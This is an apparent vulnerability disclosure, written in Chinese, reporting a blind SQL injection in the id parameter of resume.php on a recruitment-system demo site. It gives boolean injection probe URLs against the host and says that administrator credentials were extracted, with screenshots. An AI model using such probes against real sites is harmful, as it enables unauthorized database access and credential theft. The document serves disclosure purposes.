### 简要描述:
嘉缘人才系统1处SQL注入.
官网DEMO测试。
### 详细说明:
嘉缘人才系统触屏版demo:
```
http://m.rccms.com/person/resume.php?id=696
```
参数id可以盲注。
```
http://m.rccms.com/person/resume.php?id=696%20and
```
会报告SQL错误。
[<img src="https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png)
```
http://m.rccms.com/person/resume.php?id=696%20and%201=1
```
可以正常显示。
[<img src="https://images.seebug.org/upload/201411/192102515a77ace993c59cd1820b40036b88622d.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192102515a77ace993c59cd1820b40036b88622d.png)
```
http://m.rccms.com/person/resume.php?id=696%20and%201=0
```
显示参数错误。
[<img src="https://images.seebug.org/upload/201411/192103013b5f7dd47270178fceed0c50f5c8de81.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/192103013b5f7dd47270178fceed0c50f5c8de81.png)
以下为使用测试程序获取的管理员账号和密码信息:
[<img src="https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png)
[<img src="https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png)
[<img src="https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210240e8f7ce481e873ad068ecd04c5cc6082b.png)
[<img src="https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210430579418af07ce582cbaa074b79c98d1a6.png)
[<img src="https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/19210439ae51098fc818a8b039fc30a51c9fcc32.png)
[<img src="https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1921044797ef2d7df57fa82ab2aec7f7aac39204.png)
京公网安备 11010502034610号
暂无评论